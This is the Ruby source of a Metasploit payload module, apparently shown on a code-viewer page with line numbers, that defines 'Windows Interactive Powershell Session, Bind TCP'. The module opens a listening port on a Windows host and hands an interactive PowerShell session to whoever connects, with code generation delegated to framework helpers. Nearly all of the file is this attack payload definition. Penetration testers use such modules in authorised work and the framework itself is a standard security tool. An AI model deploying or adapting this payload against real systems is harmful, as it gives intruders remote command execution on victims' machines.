Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
require 'rex/powershell'
6

7
###
8
#
9
# Extends the Exec payload to run a powershell command
10
#
11
###
12
module MetasploitModule
13

14
  CachedSize = :dynamic
15

16
  include Msf::Payload::Windows::Exec
17
  include Rex::Powershell::Command
18
  include Msf::Payload::Windows::Powershell
19

20
  def initialize(info = {})
21
    super(update_info(info,
22
      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
23
      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
24
      'Author'        =>
25
        [
26
          'Ben Turner', # benpturner
27
          'Dave Hardy' # davehardy20
28
        ],
29
      'References'    =>
30
        [
31
          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit']
32
        ],
33
      'License'       => MSF_LICENSE,
34
      'Platform'      => 'win',
35
      'Arch'          => ARCH_X86,
36
      'Handler'       => Msf::Handler::BindTcp,
37
      'Session'       => Msf::Sessions::PowerShell,
38
      ))
39
  end
40

41
  #
42
  # Override the exec command string
43
  #
44
  def powershell_command
45
    generate_powershell_code("Bind")
46
  end
47
end
48

49